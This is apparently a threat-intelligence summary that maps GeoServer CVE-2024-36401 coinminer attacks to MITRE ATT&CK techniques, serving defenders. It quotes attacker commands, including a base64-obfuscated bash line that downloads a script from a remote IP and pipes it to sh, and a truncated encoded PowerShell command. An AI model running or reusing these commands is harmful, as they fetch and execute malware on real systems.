GeoServer, Where Various CoinMiner Attacks Occur

MITRE Techniques

• [T1190 ] Exploit Public-Facing Application – GeoServer CVE exploitation to achieve RCE: ‘a vulnerability (CVE-2024-36401) was disclosed in 2024… threat actors have since been exploiting this vulnerability to install malware.’
• [T1059.001 ] Command and Scripting Interpreter: PowerShell – Encoded PowerShell commands used to fetch and execute payloads: ‘powershell.exe -enc SQBFAFgAIAAoAE4AZQB3…’
• [T1059.004 ] Command and Scripting Interpreter: Unix Shell – Use of bash to decode and run downloaded shell payloads: ‘bash -c {echo,Y3VybCAtZnNTTCBodHRwOi8vMjIwLjg0LjEwNy42OS9qcy9nbC50eHQgfHNoCg==}|{base64,-d}|{bash,-i}’
• [T1105 ] Ingress Tool Transfer – Malware and miner binaries are downloaded from remote hosting to victim systems: ‘The malware strains… are uploaded to the following addresses and are downloaded and installed by Batch malware “gw.txt” or Bash malware “gl.txt”.’
• [T1218 ] Signed Binary Proxy Execution / Living off the Land – Use of built-in utilities to retrieve/execute payloads, specifically certutil for installation: ‘Another threat actor installed malware using the certutil command.’
• [T1543.003 ] Create or Modify System Process: Windows Service – Use of NSSM to install and run XMRig as a service for persistence: ”3.bat’ uses NSSM to execute “java.exe”, which is actually XMRig… install XMRig as a service using NSSM.’
• [T1562.001 ] Impair Defenses: Disable or Modify Security Tools – Attempts to add Defender exclusions and disable Windows Defender to avoid detection: ‘add an exception path to Windows Defender and disable it.’
• [T1027 ] Obfuscated Files or Information – Use of encrypted/packed payloads and loaders that decrypt in-memory (hello.dat/javap.exe) to hide miner: ‘javap.exe is a loader that reads and decrypts the “hello.dat” file… The decrypted file is XMRig.’